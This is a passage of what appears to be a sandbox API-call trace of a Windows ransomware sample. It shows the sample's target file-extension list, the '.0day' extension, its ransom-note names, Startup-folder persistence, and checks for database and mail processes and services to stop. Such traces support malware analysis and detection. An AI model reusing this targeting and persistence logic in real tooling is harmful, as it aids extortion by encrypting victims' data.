0x4f33b8 [0262.005] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f33d0 [0262.005] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f33e8 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3400 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3418 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3430 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3448 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3460 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3478 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3490 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4f34a8 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x12) returned 0x4da438 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f34c0 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f34d8 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f34f0 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3508 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3520 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3538 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3550 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3568 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3580 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3598 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f35b0 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f35c8 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f35e0 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f35f8 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3610 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3628 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3640 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3658 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fafe8 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fb000 [0262.006] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4fb018 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4fb030 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4fb048 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe) returned 0x4fb060 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4fb078 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x5221a8 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fb090 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x5221b8 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fb0a8 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fb0c0 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fb0d8 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4fb0f0 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4fb108 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fb120 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4fb138 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fb150 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fb168 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4fb180 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fb198 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4fb1b0 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4fb1c8 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fb1e0 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x5221c8 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fb1f8 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fb210 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fb228 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fb240 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fb258 [0262.007] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fb270 [0262.007] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x521a78, Size=0x800) returned 0x4fb3d0 [0262.008] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776 [0262.008] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x532ea0 | out: hHeap=0x4a0000) returned 1 [0262.008] lstrlenW (lpString="") returned 0 [0262.008] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fc388 | out: hHeap=0x4a0000) returned 1 [0262.008] lstrlenW (lpString=".0day") returned 5 [0262.008] lstrlenW (lpString=".0day") returned 5 [0262.008] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fc388 | out: hHeap=0x4a0000) returned 1 [0262.008] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4fc3b8, Size=0x20) returned 0x4d9da0 [0262.008] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9da0, Size=0x40) returned 0x4daec8 [0262.008] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4daec8, Size=0x80) returned 0x51ee90 [0262.008] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x522238, Size=0x8) returned 0x522248 [0262.008] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x522248, Size=0x10) returned 0x4fc3b8 [0262.008] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4fc3b8, Size=0x20) returned 0x4d9df0 [0262.008] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48 [0262.008] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x51ee90 | out: hHeap=0x4a0000) returned 1 [0262.008] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x532ed0, Size=0x20) returned 0x4d9e18 [0262.008] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9e18, Size=0x40) returned 0x4daec8 [0262.008] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0262.008] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0262.008] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4daec8 | out: hHeap=0x4a0000) returned 1 [0262.008] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x532ed0, Size=0x20) returned 0x4d9e18 [0262.009] lstrlenW (lpString="Info.hta") returned 8 [0262.009] lstrlenW (lpString="Info.hta") returned 8 [0262.009] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9e18 | out: hHeap=0x4a0000) returned 1 [0262.009] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x555e60, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\agent1c.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\agent1c.exe")) returned 0x67 [0264.993] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x555e60 | out: hHeap=0x4a0000) returned 1 [0264.993] lstrlenW (lpString="agent1c.exe") returned 11 [0264.993] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9df0, Size=0x40) returned 0x4daf58 [0264.993] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x532f18, Size=0x20) returned 0x4d9df0 [0264.993] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x532f18, Size=0x20) returned 0x4d9ee0 [0264.993] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9ee0, Size=0x40) returned 0x4dafa0 [0264.993] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dafa0, Size=0x80) returned 0x51ee90 [0264.993] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x51ee90, Size=0x100) returned 0x4f0fa0 [0264.993] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0264.993] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0fa0 | out: hHeap=0x4a0000) returned 1 [0264.993] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x555e48, nSize=0x8000 | out: lpDst="C:\\Windows;") returned 0xc [0264.993] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x565e50 | out: hHeap=0x4a0000) returned 1 [0264.993] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x555e48 | out: hHeap=0x4a0000) returned 1 [0264.993] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x522248, Size=0x8) returned 0x522178 [0264.993] lstrlenW (lpString="%windir%;") returned 9 [0264.994] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9df0 | out: hHeap=0x4a0000) returned 1 [0264.994] lstrlenW (lpString="C:\\Windows;") returned 11 [0264.994] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x500688 | out: hHeap=0x4a0000) returned 1 [0264.994] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x532f90, Size=0x20) returned 0x4d9df0 [0264.994] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9df0, Size=0x40) returned 0x4dafa0 [0264.994] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dafa0, Size=0x80) returned 0x51ee90 [0264.994] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x51ee90, Size=0x100) returned 0x4f0fa0 [0264.994] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x522268, Size=0x8) returned 0x521a90 [0264.994] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x521a90, Size=0x10) returned 0x532ff0 [0264.994] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x532ff0, Size=0x20) returned 0x4d9df0 [0264.994] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x522248, Size=0x8) returned 0x522268 [0264.994] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x522238, Size=0x8) returned 0x522248 [0264.994] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x521a90, Size=0x8) returned 0x521aa0 [0264.994] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x521aa0, Size=0x10) returned 0x533098 [0264.994] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x533098, Size=0x20) returned 0x4d9ee0 [0264.994] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x522268, Size=0x10) returned 0x533098 [0264.994] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x522248, Size=0x10) returned 0x5330c8 [0264.994] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x522268, Size=0x8) returned 0x521aa0 [0264.994] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x521ab0, Size=0x8) returned 0x521ac0 [0264.994] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x533098, Size=0x20) returned 0x4d9f08 [0264.994] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x5330c8, Size=0x20) returned 0x4d9f30 [0264.994] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x521ad0, Size=0x8) returned 0x521ae0 [0264.994] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x533140, Size=0x20) returned 0x4d9f80 [0264.994] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x500688, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0264.994] lstrlenW (lpString="C:\\") returned 3 [0264.994] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x18fcac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18fcac*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0264.995] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x500688 | out: hHeap=0x4a0000) returned 1 [0264.995] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x521b10, Size=0x82) returned 0x533730 [0264.995] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x521b30, Size=0x100) returned 0x4f0fa0 [0264.995] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x533730, Size=0x104) returned 0x5338e0 [0264.995] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4f0fa0, Size=0x200) returned 0x4f6fe8 [0264.996] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x521b20 | out: hHeap=0x4a0000) returned 1 [0264.996] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f6fe8 | out: hHeap=0x4a0000) returned 1 [0264.996] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x5331e8 | out: hHeap=0x4a0000) returned 1 [0264.996] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x51f0b0 | out: hHeap=0x4a0000) returned 1 [0264.996] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x5331a0 | out: hHeap=0x4a0000) returned 1 [0264.996] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x51f028 | out: hHeap=0x4a0000) returned 1 [0264.996] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x5331d0 | out: hHeap=0x4a0000) returned 1 [0264.996] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x5338e0 | out: hHeap=0x4a0000) returned 1 [0264.996] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x5331b8 | out: hHeap=0x4a0000) returned 1 [0264.996] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x5337c0 | out: hHeap=0x4a0000) returned 1 [0264.996] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x533200 | out: hHeap=0x4a0000) returned 1 [0264.996] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x533850 | out: hHeap=0x4a0000) returned 1 [0264.996] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x533218 | out: hHeap=0x4a0000) returned 1 [0264.996] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x533218, Size=0x20) returned 0x4d9fa8 [0264.996] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9fa8, Size=0x40) returned 0x4dafa0 [0265.204] WaitForMultipleObjects (nCount=0x2, lpHandles=0x4dbe10*=0x100, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 47 os_tid = 0x594 Thread: id = 49 os_tid = 0x618 [0261.996] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4f31e0 [0261.996] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4f31e0, Size=0x20) returned 0x4d9c10 [0261.996] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9c10, Size=0x40) returned 0x4dad60 [0261.996] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dad60, Size=0x80) returned 0x51ee90 [0261.996] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x51ee90, Size=0x100) returned 0x4f0e98 [0261.996] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4f31e0 [0261.996] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4f31e0, Size=0x20) returned 0x4d9c10 [0261.996] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9c10, Size=0x40) returned 0x4dad60 [0261.996] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dad60, Size=0x80) returned 0x51ee90 [0261.996] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x51ee90, Size=0x100) returned 0x4f0fa0 [0261.996] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4f31e0 [0261.996] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x4) returned 0x522178 [0261.996] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4f31f8 [0261.996] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x522178, Size=0x8) returned 0x522188 [0261.996] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4da2d8 [0261.996] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x522188, Size=0x10) returned 0x4f3210 [0261.996] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4da2f8 [0261.996] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1a) returned 0x4d9c10 [0261.996] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4f3210, Size=0x20) returned 0x4d9c38 [0261.996] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1c) returned 0x4d9c60 [0261.996] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x16) returned 0x4da318 [0261.997] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1a) returned 0x4d9c88 [0261.997] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4f3210 [0261.997] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x4) returned 0x522188 [0261.997] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x40) returned 0x4dad60 [0261.997] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x522188, Size=0x8) returned 0x522178 [0261.997] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x3c) returned 0x4dada8 [0261.997] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x522178, Size=0x10) returned 0x4f3228 [0261.997] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4da338 [0261.997] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4da358 [0261.997] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4f3228, Size=0x20) returned 0x4d9cb0 [0261.997] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x24) returned 0x533ea8 [0261.997] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0261.997] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0e98 | out: hHeap=0x4a0000) returned 1 [0261.997] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0261.997] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0fa0 | out: hHeap=0x4a0000) returned 1 [0261.997] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4d9e18 [0262.208] EnumServicesStatusExW (in: hSCManager=0x4d9e18, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 0 [0262.208] GetLastError () returned 0xea [0262.208] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa08) returned 0x565e68 [0262.209] EnumServicesStatusExW (in: hSCManager=0x4d9e18, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x565e68, cbBufSize=0xa08, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x565e68, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 1 [0262.210] CloseServiceHandle (hSCObject=0x4d9e18) returned 1 [0262.212] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0262.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0262.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0262.212] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0262.212] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0262.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0262.212] lstrlenW (lpString="AudioSrv") returned 8 [0262.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0262.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0262.212] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0262.212] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0262.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0262.212] lstrlenW (lpString="BFE") returned 3 [0262.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0262.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0262.212] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0262.212] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0262.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0262.212] lstrlenW (lpString="CscService") returned 10 [0262.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0262.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0262.212] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0262.212] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0262.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0262.212] lstrlenW (lpString="DcomLaunch") returned 10 [0262.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0262.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0262.213] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0262.213] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0262.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0262.213] lstrlenW (lpString="Dhcp") returned 4 [0262.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0262.213] lstrcmpiW 